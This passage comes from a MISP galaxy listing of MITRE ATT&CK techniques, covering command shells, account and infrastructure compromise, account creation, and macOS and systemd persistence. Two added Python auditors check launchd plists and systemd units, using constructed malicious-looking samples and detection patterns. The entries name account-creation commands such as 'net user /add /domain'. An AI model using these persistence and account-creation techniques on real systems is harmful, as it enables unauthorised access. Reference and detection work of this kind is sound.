Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Adversaries may leverage cmd to execute various commands and payloads. Common uses include cmd to execute a single command, or abusing cmd interactively with input and output forwarded over a command and control channel.

Internal MISP references

UUID be095bcc-4769-4010-b2db-3033d01efdbe which can be used as unique global reference for Windows Command Shell in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1059.003

Command and Scripting Interpreter

Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities; for example, macOS and Linux distributions include some flavor of Unix Shell, while Windows installations include the Windows Command Shell and PowerShell.

There are also cross-platform interpreters such as Python, as well as those commonly associated with client applications such as JavaScript and Visual Basic.

Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in Initial Access payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various Remote Services in order to achieve remote Execution.[Powershell Remote Commands][Cisco IOS Software Integrity Assurance - Command History][Remote Shell Execution in Python]

Internal MISP references

UUID a2184d53-63b1-4c40-81ed-da799080c36c which can be used as a unique global reference for Command and Scripting Interpreter in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Google Workspace', 'IaaS', 'Linux', 'macOS', 'Network', 'Office 365', 'Windows']
source MITRE

Communication Through Removable Media

Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by Replication Through Removable Media. Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.

Internal MISP references

UUID 0783c499-1564-4062-addc-f1ff86ef4e59 which can be used as a unique global reference for Communication Through Removable Media in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE

Cloud Accounts - Duplicate2

Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for Exfiltration to Cloud Storage or to Upload Tools. Cloud accounts can also be used in the acquisition of infrastructure, such as Virtual Private Servers or Serverless infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.[Awake Security C2 Cloud]

A variety of methods exist for compromising cloud accounts, such as gathering credentials via Phishing for Information, purchasing credentials from third-party sites, conducting Password Spraying attacks, or attempting to Steal Application Access Tokens.[MSTIC Nobelium Oct 2021] Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a Trusted Relationship between service providers and their customers.[MSTIC Nobelium Oct 2021]

Internal MISP references

UUID 4b187604-88ab-4972-9836-90a04c705e10 which can be used as a unique global reference for Cloud Accounts - Duplicate2 in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1586.003

Email Accounts - Duplicate

Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct Phishing for Information, Phishing, or large-scale spam email campaigns. Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: Domains).

A variety of methods exist for compromising email accounts, such as gathering credentials via Phishing for Information, purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.[AnonHBGary][Microsoft DEV-0537] Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Adversaries may target compromising well-known email accounts or domains from which malicious spam or Phishing emails may evade reputation-based email filtering rules.

Adversaries can use a compromised email account to hijack existing email threads with targets of interest.

Internal MISP references

UUID 49ae7bf1-a313-41d6-ad4c-74efc4c80ab6 which can be used as a unique global reference for Email Accounts - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1586.002

Social Media Accounts - Duplicate

Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. Social Media Accounts), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona.

A variety of methods exist for compromising social media accounts, such as gathering credentials via Phishing for Information, purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).[AnonHBGary] Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.

Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development; this could include filling out or modifying profile information, further developing social networks, or incorporating photos.

Adversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest. These connections may be direct or may include trying to connect through others.[NEWSCASTER2014][BlackHatRobinSage] Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: Spearphishing via Service).

Internal MISP references

UUID 3426077d-3b9c-4f77-a1c6-d68f0dea670e which can be used as a unique global reference for Social Media Accounts - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1586.001

Compromise Accounts

Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. Establish Accounts), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona.

A variety of methods exist for compromising accounts, such as gathering credentials via Phishing for Information, purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.[AnonHBGary][Microsoft DEV-0537] Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.

Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development; this could include filling out or modifying profile information, further developing social networks, or incorporating photos.

Adversaries may directly leverage compromised email accounts for Phishing for Information or Phishing.

Internal MISP references

UUID c6374cbe-799a-4648-b1e2-2a66bb42d3f3 which can be used as a unique global reference for Compromise Accounts in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE

Compromise Client Software Binary

Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers.

Adversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one. An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)[Unit42 Banking Trojans Hooking 2022] prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.[ESET FontOnLake Analysis 2021]

Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host.

Internal MISP references

UUID 05435e33-05fe-4a41-b8e4-694d45eb9147 which can be used as a unique global reference for Compromise Client Software Binary in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE

Botnet

Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.[Norton Botnet] Instead of purchasing/renting a botnet from a booter/stresser service, adversaries may build their own botnet by compromising numerous third-party systems.[Imperva DDoS for Hire] Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.[Dell Dridex Oct 2015] With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale Phishing or Distributed Denial of Service (DDoS).

Internal MISP references

UUID 66caa162-711c-44ac-b96d-0552cf328f84 which can be used as a unique global reference for Botnet in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1584.005

DNS Server - Duplicate

Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: Application Layer Protocol). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.

By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.[Talos DNSpionage Nov 2018][FireEye DNS Hijack 2019] Additionally, adversaries may leverage such control in conjunction with Digital Certificates to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.[FireEye DNS Hijack 2019][Crowdstrike DNS Hijack 2019] Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.[CiscoAngler][Proofpoint Domain Shadowing]

Internal MISP references

UUID 83e4f633-67fb-4d87-b1b3-8a7a2e60778b which can be used as a unique global reference for DNS Server - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1584.002

Domains

Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.[ICANNDomainNameHijacking] Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.[Krebs DNS Hijack 2019]

Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.[Microsoft Sub Takeover 2020]

Adversaries who compromise a domain may also engage in domain shadowing by creating malicious subdomains under their control while keeping any existing DNS records. As service will not be disrupted, the malicious subdomains may go unnoticed for long periods of time.[Palo Alto Unit 42 Domain Shadowing 2022]

Internal MISP references

UUID 581722ea-81a5-4c73-a703-2c994f1cf814 which can be used as a unique global reference for Domains in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1584.001

Server

Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a Server or Virtual Private Server, adversaries may compromise third-party servers in support of operations.

Adversaries may also compromise web servers to support watering hole operations, as in Drive-by Compromise, or email servers to support Phishing operations.

Internal MISP references

UUID ce71e252-3403-4287-a0b5-9328fa88af96 which can be used as a unique global reference for Server in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1584.004

Serverless

Adversaries may compromise serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.

Once compromised, the serverless runtime environment can be leveraged to either respond directly to infected machines or to Proxy traffic to an adversary-owned command and control server.[BlackWater Malware Cloudflare Workers][AWS Lambda Redirector] As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.[Detecting Command & Control in the Cloud][BlackWater Malware Cloudflare Workers]

Internal MISP references

UUID f2b5a3e4-8a59-41f5-88c4-142f2da251c8 which can be used as a unique global reference for Serverless in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1584.007

Virtual Private Server

Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.[NSA NCSC Turla OilRig]

Compromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.

Internal MISP references

UUID 3bd8c928-a7c8-4376-8f2f-2e0fcb449b37 which can be used as a unique global reference for Virtual Private Server in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1584.003

Web Services

Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, SendGrid, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control (Web Service), Exfiltration Over Web Service, or Phishing.[Recorded Future Turla Infra 2020] Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. Additionally, leveraging compromised web-based email services may allow adversaries to leverage the trust associated with legitimate domains.

Internal MISP references

UUID ef312a77-6b1a-4be6-a220-3c689e7fcd9d which can be used as a unique global reference for Web Services in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1584.006

Compromise Infrastructure

Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure, an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.[Mandiant APT1][ICANNDomainNameHijacking][Talos DNSpionage Nov 2018][FireEye EPS Awakens Part 2] Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.

Use of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with Digital Certificates) to further blend in and support staged information gathering and/or Phishing campaigns.[FireEye DNS Hijack 2019] Additionally, adversaries may also compromise infrastructure to support Proxy and/or proxyware services.[amnesty_nso_pegasus][Sysdig Proxyjacking]

By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.[NSA NCSC Turla OilRig]

Internal MISP references

UUID c12d81d3-abe4-43d7-8a65-f4b3150e722d which can be used as a unique global reference for Compromise Infrastructure in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE

Container Administration Command

Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.[Docker Daemon CLI][Kubernetes API][Kubernetes Kubelet]

In Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as docker exec to execute a command within a running container.[Docker Entrypoint][Docker Exec] In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as kubectl exec.[Kubectl Exec Get Shell]

Internal MISP references

UUID 0b9609dd-9f19-4747-ba6e-421b6b7ff03f which can be used as a unique global reference for Container Administration Command in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers']
source MITRE

Container and Resource Discovery

Adversaries may attempt to discover containers and other resources that are available within a container environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.

These resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs.[Docker API][Kubernetes API] In Docker, logs may leak information about the environment, such as the environment’s configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary’s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution.

Internal MISP references

UUID 41c4b4cc-99da-4323-b0f4-229906578501 which can be used as a unique global reference for Container and Resource Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers']
source MITRE

Content Injection

Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic. Rather than luring victims to malicious payloads hosted on a compromised website (i.e., Drive-by Target followed by Drive-by Compromise), adversaries may initially access victims through compromised data-transfer channels where they can manipulate traffic and/or inject their own content. These compromised online network channels may also be used to deliver additional payloads (i.e., Ingress Tool Transfer) and other data to already compromised systems.[ESET MoustachedBouncer]

Adversaries may inject content to victim systems in various ways, including:

  • From the middle, where the adversary is in-between legitimate online client-server communications (Note: this is similar but distinct from Adversary-in-the-Middle, which describes AiTM activity solely within an enterprise environment) [Kaspersky Encyclopedia MiTM]
  • From the side, where malicious content is injected and races to the client as a fake response to requests of a legitimate online server [Kaspersky ManOnTheSide]

Content injection is often the result of compromised upstream communication channels, for example at the level of an internet service provider (ISP) as is the case with "lawful interception."[Kaspersky ManOnTheSide][ESET MoustachedBouncer][EFF China GitHub Attack]

Internal MISP references

UUID 3f95e4f2-cd4a-502c-a12a-becb8d28440c which can be used as a unique global reference for Content Injection in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE

Cloud Account

Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.[Microsoft O365 Admin Roles][Microsoft Support O365 Add Another Admin, October 2019][AWS Create IAM User][GCP Create Cloud Identity Users][Microsoft Azure AD Users]

Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.

Once an adversary has created a cloud account, they can then manipulate that account to ensure persistence and allow access to additional resources - for example, by adding Additional Cloud Credentials or assigning Additional Cloud Roles.

Internal MISP references

UUID d6504a4d-f6d7-4517-b0fd-ec7128d4dec9 which can be used as a unique global reference for Cloud Account in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1136.003

Domain Account

Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account.

Such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.

Internal MISP references

UUID 7a7e10ce-f033-460c-9183-5e29a9feb927 which can be used as a unique global reference for Domain Account in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1136.002

Local Account

Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.

For example, with a sufficient level of access, the Windows net user /add command can be used to create a local account. On macOS systems the dscl -create command can be used to create a local account. Local accounts may also be added to network devices, often via common Network Device CLI commands such as username, or to Kubernetes clusters using the kubectl utility.[cisco_username_cmd][Kubernetes Service Accounts Security]

Such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.

Internal MISP references

UUID 287201c6-56c8-458d-a6b3-5d84ad1099d7 which can be used as a unique global reference for Local Account in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1136.001

Create Account

Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.

Accounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.

Internal MISP references

UUID 55bcf759-a0bf-47e9-99f8-4e8ca997e6ce which can be used as a unique global reference for Create Account in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Containers', 'Google Workspace', 'IaaS', 'Linux', 'macOS', 'Network', 'Office 365', 'SaaS', 'Windows']
source MITRE

Launch Agent

Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in /System/Library/LaunchAgents, /Library/LaunchAgents, and ~/Library/LaunchAgents.[AppleDocs Launch Agent Daemons][OSX Keydnap malware][Antiquated Mac Malware] Property list files use the Label, ProgramArguments, and RunAtLoad keys to identify the Launch Agent's name, executable location, and execution time.[OSX.Dok Malware] Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.

Launch Agents can also be executed using the Launchctl command.

Adversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the RunAtLoad or KeepAlive keys set to true.[Sofacy Komplex Trojan][Methods of Mac Malware Persistence] The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.[OSX Malware Detection][OceanLotus for OS X]

Internal MISP references

UUID 6dbe030c-5f87-4b45-9b6b-5bba2c0fad00 which can be used as a unique global reference for Launch Agent in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1543.001

Launch Daemon

Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/ and /Library/LaunchDaemons/. Required Launch Daemons parameters include a Label to identify the task, Program to provide a path to the executable, and RunAtLoad to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.[AppleDocs Launch Agent Daemons][Methods of Mac Malware Persistence][launchd Keywords for plists]

Adversaries may install a Launch Daemon configured to execute at startup by using the RunAtLoad parameter set to true and the Program parameter set to the malicious executable path. The daemon name may be disguised by using a name from a related operating system or benign software (i.e. Masquerading). When the Launch Daemon is executed, the program inherits administrative permissions.[WireLurker][OSX Malware Detection]

Additionally, system configuration changes (such as the installation of third-party package management software) may cause folders such as /usr/local/bin to become world-writable. Such poor configurations can allow an adversary to modify the executables referenced by existing Launch Daemons' plist files.[LaunchDaemon Hijacking][sentinelone macos persist Jun 2019]
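A defender-side audit of the plist keys the Launch Agent and Launch Daemon entries above describe (Label, Program/ProgramArguments, RunAtLoad, KeepAlive), including the world-writable executable case. This is an added example, not code from the MISP galaxy or MITRE; the two sample plists and the list of trusted system path prefixes are constructed for it.

```python
"""Audit launchd property lists for the persistence indicators described above.

Added example (not from the MISP galaxy or MITRE): parses LaunchAgent /
LaunchDaemon plists and flags auto-start entries (RunAtLoad / KeepAlive)
whose executable lives outside Apple-owned paths, labels that imitate
Apple while pointing at a third-party binary, and referenced executables
that are world-writable and therefore hijackable.
"""
import os
import plistlib
import stat
from dataclasses import dataclass, field

# Constructed list of prefixes Apple itself ships binaries under.
SYSTEM_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Library/Apple/")


@dataclass
class LaunchItem:
    label: str
    program: str            # resolved executable path ("" if absent)
    run_at_load: bool
    keep_alive: bool
    findings: list = field(default_factory=list)


def parse_launchd_plist(data: bytes) -> LaunchItem:
    """Extract the persistence-relevant keys from a plist (XML or binary)."""
    p = plistlib.loads(data)
    args = p.get("ProgramArguments") or []
    program = p.get("Program") or (args[0] if args else "")
    # KeepAlive may be a bool or a dict of conditions; any dict counts as on.
    return LaunchItem(
        label=str(p.get("Label", "")),
        program=str(program),
        run_at_load=bool(p.get("RunAtLoad", False)),
        keep_alive=bool(p.get("KeepAlive", False)),
    )


def is_world_writable(path: str):
    """True/False from the filesystem, None when the path cannot be stat'ed."""
    try:
        return bool(os.stat(path).st_mode & stat.S_IWOTH)
    except OSError:
        return None


def assess(item: LaunchItem) -> LaunchItem:
    """Attach human-readable findings; an empty list means nothing notable."""
    auto = item.run_at_load or item.keep_alive
    third_party = bool(item.program) and not item.program.startswith(SYSTEM_PREFIXES)
    if auto and third_party:
        item.findings.append(f"auto-start of non-system binary {item.program}")
    if item.label.startswith("com.apple.") and third_party:
        item.findings.append("label imitates Apple but binary is outside system paths")
    if not item.program:
        item.findings.append("no Program/ProgramArguments (malformed or unusual)")
    if is_world_writable(item.program):
        item.findings.append(f"{item.program} is world-writable (hijackable)")
    return item


def audit_directory(directory: str) -> list:
    """Parse and assess every .plist in a LaunchAgents/LaunchDaemons folder."""
    results = []
    for name in sorted(os.listdir(directory)):
        if name.endswith(".plist"):
            with open(os.path.join(directory, name), "rb") as fh:
                results.append(assess(parse_launchd_plist(fh.read())))
    return results


# Constructed sample: Apple-looking label, hidden third-party binary, auto-start.
SAMPLE_SUSPICIOUS = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.softwareupdate.helper</string>
  <key>ProgramArguments</key><array>
    <string>/Users/Shared/.cache/updater</string><string>--quiet</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

# Constructed sample: auto-start of a binary under a system path.
SAMPLE_BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.example.agent</string>
  <key>Program</key><string>/System/Library/CoreServices/example-agent</string>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

if __name__ == "__main__":
    for blob in (SAMPLE_SUSPICIOUS, SAMPLE_BENIGN):
        item = assess(parse_launchd_plist(blob))
        print(item.label, "->", item.findings or "clean")
```

Running audit_directory over ~/Library/LaunchAgents, /Library/LaunchAgents and /Library/LaunchDaemons gives a quick triage list; the world-writable check only fires when the referenced path exists on the host doing the audit.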

Internal MISP references

UUID eff618a9-6498-4b01-bca1-cd5f3784fc27 which can be used as unique global reference for Launch Daemon in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1543.004
Related clusters

To see the related clusters, click here.

Systemd Service

Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.[Linux man-pages: systemd January 2014] Systemd is the default initialization (init) system on many Linux distributions, replacing legacy init systems including SysVinit and Upstart while remaining backwards compatible.

Systemd uses unit configuration files with the .service file extension to describe a service's process. By default, system-level unit files are stored in /systemd/system directories under root-owned locations (/), and user-level unit files in /systemd/user directories under the user's home directory ($HOME).[lambert systemd 2022]

Inside the .service unit files, the following directives are used to execute commands:[freedesktop systemd.service]

  • ExecStart, ExecStartPre, and ExecStartPost directives execute when a service is started manually by systemctl or on system start if the service is set to automatically start.
  • ExecReload directive executes when a service restarts.
  • ExecStop, ExecStopPre, and ExecStopPost directives execute when a service is stopped.

Adversaries have created new service files, altered the commands a .service file’s directive executes, and modified the user directive a .service file executes as, which could result in privilege escalation. Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem.[Anomali Rocke March 2019][airwalk backdoor unix systems][Rapid7 Service Persistence 22JUNE2016]
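A small auditor for the .service directives listed above (the Exec* family and User), flagging units that launch executables from writable staging locations or that were dropped into a unit directory as symbolic links. Added example, not code from the MISP galaxy or MITRE; the two sample units and the staging-path list are constructed for it.

```python
"""Audit systemd .service units for the persistence patterns described above.

Added example, not from the MISP galaxy or MITRE. The [Service] section is
parsed by hand because systemd permits repeated Exec* keys, which
configparser would collapse into one.
"""
import os
import re
import shlex

EXEC_DIRECTIVES = ("ExecStartPre", "ExecStart", "ExecStartPost",
                   "ExecReload", "ExecStop", "ExecStopPre", "ExecStopPost")
# Constructed list: locations a legitimate service binary should not live in.
STAGING_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/root/")


def parse_unit(text: str) -> dict:
    """Return {section: [(key, value), ...]} preserving duplicate keys."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = re.fullmatch(r"\[([\w-]+)\]", line)
        if m:
            current = m.group(1)
            sections.setdefault(current, [])
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current].append((key.strip(), value.strip()))
    return sections


def exec_binary(value: str) -> str:
    """Strip systemd's Exec prefixes (-, @, +, !) and return argv[0]."""
    argv = shlex.split(value)
    return argv[0].lstrip("-@+!") if argv else ""


def assess_unit(text: str, unit_path: str = "") -> list:
    """Findings for one unit; an empty list means nothing stood out."""
    findings = []
    service = parse_unit(text).get("Service", [])
    # systemd runs a service as root unless User= says otherwise.
    user = next((v for k, v in service if k == "User"), "root")
    for key, value in service:
        if key not in EXEC_DIRECTIVES:
            continue
        binary = exec_binary(value)
        if binary.startswith(STAGING_PREFIXES):
            findings.append(f"{key} runs {binary} from a writable staging path")
    if user == "root" and findings:
        findings.append("unit runs as root, so the staged binary gains root")
    if unit_path and os.path.islink(unit_path):
        findings.append(f"{unit_path} is a symlink to {os.readlink(unit_path)}")
    return findings


def audit_directory(directory: str) -> dict:
    """Map each *.service file in a unit directory to its findings."""
    report = {}
    for name in sorted(os.listdir(directory)):
        if name.endswith(".service"):
            path = os.path.join(directory, name)
            with open(path, encoding="utf-8") as fh:
                report[name] = assess_unit(fh.read(), path)
    return report


# Constructed sample: benign-looking description, payload staged under /tmp.
SAMPLE_SUSPICIOUS = """\
[Unit]
Description=Network Time Synchronisation
[Service]
Type=simple
ExecStartPre=-/bin/mkdir -p /tmp/.x
ExecStart=/tmp/.x/ntpdate -s
Restart=always
[Install]
WantedBy=multi-user.target
"""

# Constructed sample: ordinary daemon launched from /usr/sbin.
SAMPLE_BENIGN = """\
[Unit]
Description=OpenSSH server
[Service]
ExecStart=/usr/sbin/sshd -D
ExecReload=/bin/kill -HUP $MAINPID
[Install]
WantedBy=multi-user.target
"""

if __name__ == "__main__":
    for text in (SAMPLE_SUSPICIOUS, SAMPLE_BENIGN):
        print(assess_unit(text) or "clean")
```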

Internal MISP references

UUID 7aae1ad0-fb1f-484a-a176-c94e4c7ada77 which can be used as unique global reference for Systemd Service in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1543.002
Related clusters

To see the related clusters, click here.

Windows Service

